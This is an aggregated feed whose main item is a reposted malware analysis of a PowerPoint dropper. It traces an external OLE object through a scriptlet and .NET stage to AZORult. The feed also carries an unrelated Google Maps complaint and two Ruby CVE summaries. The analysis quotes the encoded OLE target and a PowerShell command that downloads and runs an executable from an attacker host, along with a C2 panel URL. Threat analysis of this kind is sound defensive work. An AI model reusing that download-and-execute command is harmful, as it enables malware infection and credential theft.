The “attack-path” is very close to what it’s observable on modern threats since years: eMail campaign with an attached document and actionable text on it. In the beginning, the Microsoft Powerpoint presentation looked like a white blank page but performing a very interesting and hidden connection to hxxps://a.doko.moe/wraeop.sct.

Analyzing the Microsoft Powerpoint structure it rises on my eyes the following slide structure

Microsoft Powerpoint dropper
Stage 1: Microsoft PowerPoint Dropping Website

An external OLEobject (compatibility 2006) was available on that value:

Target=”%73%63%72%49%50%54:%68%74%74%70%73%3A%2F%2F%61%2E%64oko%2Emo%65%2Fwr%61%65o%70%2E%73%63%74″  

Decoding that string from HEX to ASCII is much more readable:

scrIPT:hxxps://a.dolo.moe/wraeop.sct

An external object is downloaded and executed like a script on the victim machine. The downloaded file (wraeop.sct) represents a Javascript code reporting the Stage 2 of the infection process. It’s showed as follows:

Microsoft Powerpoint dropper 2
Stage 2: Executed Javascript

Decoding the 3.6K script appears clear that one more Stage is involved in the infection process. The following code is the execution path that drives Stage 2 to Stage 3.

var run = new ActiveXObject(‘WSCRIPT.Shell’).Run(powershell  -nologo -executionpolicy bypass -noninteractive -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile(‘http://batteryenhancer.com/oldsite/Videos/js/DAZZI.exe’, ‘%temp%/VRE1wEh9j0mvUATIN3AqW1HSNnyir8id.exe’); Start-Process ‘%temp%/VRE1wEh9j0mvUATIN3AqW1HSNnyir8id.exe’ ); 

The script downloads a file named: AZZI.exe and saves it by a new name: VRE1wEh9j0mvUATIN3AqW1HSNnyir8id.exe on a System temporary directory for running it. The downloaded PE Executable is a .NET file created by ExtendedScript Toolkit (according to compilation time) on 2018-11-13 15:21:54 and submitted a few hours later on VirusTotal.

Microsoft Powerpoint dropper 2

Microsoft Powerpoint dropper 4
Stage 3: .NET file

The Third stage uses an internal resource (which happens to be an image) to read and execute additional code: the final payload or Stage 4. In other words Stage 3 reads an image placed under the internal resource of PE File, extracts and executes it. The final payload looks like AzoRult Malware. The evidence comes from traffic analysis where the identified pattern sends (HTTP POST) data on browser history and specifically crafted files under User – AppData to specific PHP pages. Moreover, the Command and control admin panel (hxxps://ominigrind.ml/azzi/panel/admin.php) looks like AZOrultV3.

Microsoft Powerpoint dropper 5
Microsoft Powerpoint dropper 6
Stage4: AZORult evidence

I hope you had fun on this, I did! It was super interesting to see the attacker’s creativity and the way the act to include malicious contents into Office Documents. Microsoft should probably take care of this and try to filter or to ask permissions before include external contents, but still, this will not be a complete solution (on my personal point of view). A more deep and invasive action would be needed to check the remote content. Stay tuned!

Indicators of Compromise (IoCs) for the malicious code are reported in the original analysis published by Marco Ramilli in his blog.

About the author: Marco Ramilli, Founder of Yoroi

I am a computer security scientist with an intensive hacking background. I do have a MD in computer engineering and a PhD on computer security from University of Bologna. During my PhD program I worked for US Government (@ National Institute of Standards and Technology, Security Division) where I did intensive researches in Malware evasion techniques and penetration testing of electronic voting systems.

 

I do have experience in security testing since I have been performing penetration testing on several US electronic voting systems. I’ve also been encharged of testing uVote voting system from the Italian Minister of homeland security. I met Palantir Technologies where I was introduced to the Intelligence Ecosystem. I decided to amplify my cyber security experiences by diving into SCADA security issues with some of the most biggest industrial aglomerates in Italy. I finally decided to found Yoroi: an innovative Managed Cyber Security Service Provider developing some of the most amazing cyber security defence center I’ve ever experienced ! Now I technically lead Yoroi defending our customers strongly believing in: Defence Belongs To Humans

Edited by Pierluigi Paganini

(Security Affairs – Microsoft Powerpoint, malware)

The post Using Microsoft Powerpoint as Malware Dropper appeared first on Security Affairs.



Security Affairs

Google Maps Has Introduced So Many New Features and Design Changes in Recent Months That Getting Directions On It is Becoming an Increasingly Challenging Task

Earlier this week, Google announced it is bringing business messaging to Maps, the latest in a myriad of features it has introduced to its mapping platform in recent months. A business that wants to participate will need to use Google's "My Business" verification system and its associated app to send and receive messages. While that could prove useful to a number of businesses and customers, it has raised a concern as well. From a report: But that leads me to my third feeling: what the heck is going on with Google Maps? It is becoming overburdened with so many features and design changes that it's becoming harder and harder to just get directions in it. There's Group Planning, there's a social-esque "follow" button for local businesses, you can share your ETA, there's a redesigned "Explore" section, and there's almost no way to get the damn thing to show you a cross street near your destination without three full minutes of desperate pinching and zooming and re-zooming. It's becoming bloated, is what I'm saying. It's Google's equivalent of Big Blue, as Facebook nicknames its flagship app that does a thousand things across countless strange nooks and crannies. It's as though Google wants to kill off Yelp once and for all, but can't let anybody notice how hard it's trying to do that so it just slow rolls those things into Google Maps instead.

Read more of this story at Slashdot.

CVE-2018-16396

An issue was discovered in Ruby before 2.3.8, 2.4.x before 2.4.5, 2.5.x before 2.5.2, and 2.6.x before 2.6.0-preview3. It does not taint strings that result from unpacking tainted strings with some formats.

CVE-2018-16395

An issue was discovered in the OpenSSL library in Ruby before 2.3.8, 2.4.x before 2.4.5, 2.5.x before 2.5.2, and 2.6.x before 2.6.0-preview3. When two OpenSSL::X509::Name objects are compared using ==, depending on the ordering, non-equal objects may return true. When the first argument is one character longer than the second, or the second argument contains a character that is one less than a character in the same position of the first argument, the result of == will be true. This could be leveraged to create an illegitimate certificate that may be accepted as legitimate and then used in signing or encryption operations.